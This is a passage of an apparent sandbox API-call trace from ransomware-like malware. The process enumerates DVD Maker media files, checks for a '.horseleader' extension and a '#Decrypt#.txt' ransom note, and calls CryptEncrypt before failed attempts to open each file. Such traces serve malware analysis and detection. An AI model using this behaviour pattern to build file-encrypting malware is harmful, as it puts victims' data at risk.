lpString2="Windows") returned -1 [0251.860] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\PreviousMenuButtonIcon.png") returned 81 [0251.861] StrStrIW (lpFirst="PreviousMenuButtonIcon.png", lpSrch=".horseleader") returned 0x0 [0251.861] lstrcmpW (lpString1="PreviousMenuButtonIcon.png", lpString2="#Decrypt#.txt") returned 1 [0251.861] lstrcmpW (lpString1="PreviousMenuButtonIcon.png", lpString2="_uninstalling_.png") returned 1 [0251.861] lstrlenW (lpString=".testttjffg") returned 11 [0251.861] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\PreviousMenuButtonIcon.png", lpSrch=".testttjffg") returned 0x0 [0251.861] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.861] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.861] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\PreviousMenuButtonIcon.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\previousmenubuttonicon.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.861] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71f458ec, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x71f458ec, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ff68a0b, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc3d, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="SceneButtonInset_Alpha1.png", cAlternateFileName="")) returned 1 [0251.861] lstrcmpiW (lpString1="SceneButtonInset_Alpha1.png", lpString2="Windows") returned -1 [0251.861] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SceneButtonInset_Alpha1.png") returned 82 [0251.861] StrStrIW (lpFirst="SceneButtonInset_Alpha1.png", lpSrch=".horseleader") returned 0x0 [0251.862] lstrcmpW (lpString1="SceneButtonInset_Alpha1.png", lpString2="#Decrypt#.txt") returned 1 [0251.862] lstrcmpW (lpString1="SceneButtonInset_Alpha1.png", lpString2="_uninstalling_.png") returned 1 [0251.862] lstrlenW (lpString=".testttjffg") returned 11 [0251.862] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SceneButtonInset_Alpha1.png", lpSrch=".testttjffg") returned 0x0 [0251.862] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.862] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.862] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SceneButtonInset_Alpha1.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\scenebuttoninset_alpha1.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.862] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71f6ba49, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x71f6ba49, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ff68a0b, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xdbe, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="SceneButtonInset_Alpha2.png", cAlternateFileName="")) returned 1 [0251.862] lstrcmpiW (lpString1="SceneButtonInset_Alpha2.png", lpString2="Windows") returned -1 [0251.862] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SceneButtonInset_Alpha2.png") returned 82 [0251.862] StrStrIW (lpFirst="SceneButtonInset_Alpha2.png", lpSrch=".horseleader") returned 0x0 [0251.862] lstrcmpW (lpString1="SceneButtonInset_Alpha2.png", lpString2="#Decrypt#.txt") returned 1 [0251.863] lstrcmpW (lpString1="SceneButtonInset_Alpha2.png", lpString2="_uninstalling_.png") returned 1 [0251.863] lstrlenW (lpString=".testttjffg") returned 11 [0251.863] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SceneButtonInset_Alpha2.png", lpSrch=".testttjffg") returned 0x0 [0251.863] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.863] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.863] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SceneButtonInset_Alpha2.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\scenebuttoninset_alpha2.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.863] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71e8721b, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x71e8721b, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ff68a0b, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc2f, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="SceneButtonSubpicture.png", cAlternateFileName="")) returned 1 [0251.863] lstrcmpiW (lpString1="SceneButtonSubpicture.png", lpString2="Windows") returned -1 [0251.863] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SceneButtonSubpicture.png") returned 80 [0251.863] StrStrIW (lpFirst="SceneButtonSubpicture.png", lpSrch=".horseleader") returned 0x0 [0251.863] lstrcmpW (lpString1="SceneButtonSubpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.863] lstrcmpW (lpString1="SceneButtonSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.863] lstrlenW (lpString=".testttjffg") returned 11 [0251.863] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SceneButtonSubpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.864] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.864] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.864] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SceneButtonSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\scenebuttonsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.865] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71893b93, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x71893b93, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x500e57b7, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x539540, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="SportsMainBackground.wmv", cAlternateFileName="")) returned 1 [0251.865] lstrcmpiW (lpString1="SportsMainBackground.wmv", lpString2="Windows") returned -1 [0251.865] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground.wmv") returned 79 [0251.865] StrStrIW (lpFirst="SportsMainBackground.wmv", lpSrch=".horseleader") returned 0x0 [0251.865] lstrcmpW (lpString1="SportsMainBackground.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.865] lstrcmpW (lpString1="SportsMainBackground.wmv", lpString2="_uninstalling_.png") returned 1 [0251.865] lstrlenW (lpString=".testttjffg") returned 11 [0251.865] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground.wmv", lpSrch=".testttjffg") returned 0x0 [0251.865] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.865] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.866] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmainbackground.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.866] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71aa8ea9, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x71aa8ea9, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x502ae81f, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x57bbc0, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="SportsMainBackground_PAL.wmv", cAlternateFileName="")) returned 1 [0251.866] lstrcmpiW (lpString1="SportsMainBackground_PAL.wmv", lpString2="Windows") returned -1 [0251.866] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground_PAL.wmv") returned 83 [0251.866] StrStrIW (lpFirst="SportsMainBackground_PAL.wmv", lpSrch=".horseleader") returned 0x0 [0251.866] lstrcmpW (lpString1="SportsMainBackground_PAL.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.866] lstrcmpW (lpString1="SportsMainBackground_PAL.wmv", lpString2="_uninstalling_.png") returned 1 [0251.866] lstrlenW (lpString=".testttjffg") returned 11 [0251.866] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground_PAL.wmv", lpSrch=".testttjffg") returned 0x0 [0251.866] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.866] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.866] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmainbackground_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.866] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71c25c4b, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x71c25c4b, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x50320c39, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1beae6, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="SportsMainToNotesBackground.wmv", cAlternateFileName="")) returned 1 [0251.866] lstrcmpiW (lpString1="SportsMainToNotesBackground.wmv", lpString2="Windows") returned -1 [0251.867] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground.wmv") returned 86 [0251.867] StrStrIW (lpFirst="SportsMainToNotesBackground.wmv", lpSrch=".horseleader") returned 0x0 [0251.867] lstrcmpW (lpString1="SportsMainToNotesBackground.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.867] lstrcmpW (lpString1="SportsMainToNotesBackground.wmv", lpString2="_uninstalling_.png") returned 1 [0251.867] lstrlenW (lpString=".testttjffg") returned 11 [0251.867] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground.wmv", lpSrch=".testttjffg") returned 0x0 [0251.867] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.867] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.867] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintonotesbackground.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.867] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71cbe1bf, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x71cbe1bf, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x50393053, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1c0a26, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="SportsMainToNotesBackground_PAL.wmv", cAlternateFileName="")) returned 1 [0251.867] lstrcmpiW (lpString1="SportsMainToNotesBackground_PAL.wmv", lpString2="Windows") returned -1 [0251.867] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground_PAL.wmv") returned 90 [0251.867] StrStrIW (lpFirst="SportsMainToNotesBackground_PAL.wmv", lpSrch=".horseleader") returned 0x0 [0251.867] lstrcmpW (lpString1="SportsMainToNotesBackground_PAL.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.867] lstrcmpW (lpString1="SportsMainToNotesBackground_PAL.wmv", lpString2="_uninstalling_.png") returned 1 [0251.867] lstrlenW (lpString=".testttjffg") returned 11 [0251.867] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground_PAL.wmv", lpSrch=".testttjffg") returned 0x0 [0251.867] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.867] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.867] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintonotesbackground_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.868] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71d7c890, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x71d7c890, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x504c3b43, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x184166, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="SportsMainToScenesBackground.wmv", cAlternateFileName="")) returned 1 [0251.868] lstrcmpiW (lpString1="SportsMainToScenesBackground.wmv", lpString2="Windows") returned -1 [0251.868] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground.wmv") returned 87 [0251.869] StrStrIW (lpFirst="SportsMainToScenesBackground.wmv", lpSrch=".horseleader") returned 0x0 [0251.869] lstrcmpW (lpString1="SportsMainToScenesBackground.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.869] lstrcmpW (lpString1="SportsMainToScenesBackground.wmv", lpString2="_uninstalling_.png") returned 1 [0251.869] lstrlenW (lpString=".testttjffg") returned 11 [0251.869] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground.wmv", lpSrch=".testttjffg") returned 0x0 [0251.869] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.869] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.869] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintoscenesbackground.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.869] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71deeca7, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x71deeca7, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x50add351, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x189f26, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="SportsMainToScenesBackground_PAL.wmv", cAlternateFileName="")) returned 1 [0251.869] lstrcmpiW (lpString1="SportsMainToScenesBackground_PAL.wmv", lpString2="Windows") returned -1 [0251.869] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground_PAL.wmv") returned 91 [0251.869] StrStrIW (lpFirst="SportsMainToScenesBackground_PAL.wmv", lpSrch=".horseleader") returned 0x0 [0251.869] lstrcmpW (lpString1="SportsMainToScenesBackground_PAL.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.869] lstrcmpW (lpString1="SportsMainToScenesBackground_PAL.wmv", lpString2="_uninstalling_.png") returned 1 [0251.869] lstrlenW (lpString=".testttjffg") returned 11 [0251.870] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground_PAL.wmv", lpSrch=".testttjffg") returned 0x0 [0251.870] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.870] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.870] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintoscenesbackground_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.870] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x713aae96, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x713aae96, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x514fb049, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x6680f4, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="SportsNotesBackground.wmv", cAlternateFileName="")) returned 1 [0251.870] lstrcmpiW (lpString1="SportsNotesBackground.wmv", lpString2="Windows") returned -1 [0251.870] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground.wmv") returned 80 [0251.870] StrStrIW (lpFirst="SportsNotesBackground.wmv", lpSrch=".horseleader") returned 0x0 [0251.870] lstrcmpW (lpString1="SportsNotesBackground.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.870] lstrcmpW (lpString1="SportsNotesBackground.wmv", lpString2="_uninstalling_.png") returned 1 [0251.870] lstrlenW (lpString=".testttjffg") returned 11 [0251.870] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground.wmv", lpSrch=".testttjffg") returned 0x0 [0251.870] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.870] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.870] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.871] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71501adb, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x71501adb, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x5206f98f, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x673c74, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="SportsNotesBackground_PAL.wmv", cAlternateFileName="")) returned 1 [0251.871] lstrcmpiW (lpString1="SportsNotesBackground_PAL.wmv", lpString2="Windows") returned -1 [0251.871] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv") returned 84 [0251.871] StrStrIW (lpFirst="SportsNotesBackground_PAL.wmv", lpSrch=".horseleader") returned 0x0 [0251.871] lstrcmpW (lpString1="SportsNotesBackground_PAL.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.871] lstrcmpW (lpString1="SportsNotesBackground_PAL.wmv", lpString2="_uninstalling_.png") returned 1 [0251.871] lstrlenW (lpString=".testttjffg") returned 11 [0251.871] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", lpSrch=".testttjffg") returned 0x0 [0251.871] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.871] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.871] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.873] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x716a49da, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x716a49da, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x522f70cd, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x2ca474, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="SportsScenesBackground.wmv", cAlternateFileName="")) returned 1 [0251.873] lstrcmpiW (lpString1="SportsScenesBackground.wmv", lpString2="Windows") returned -1 [0251.873] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD 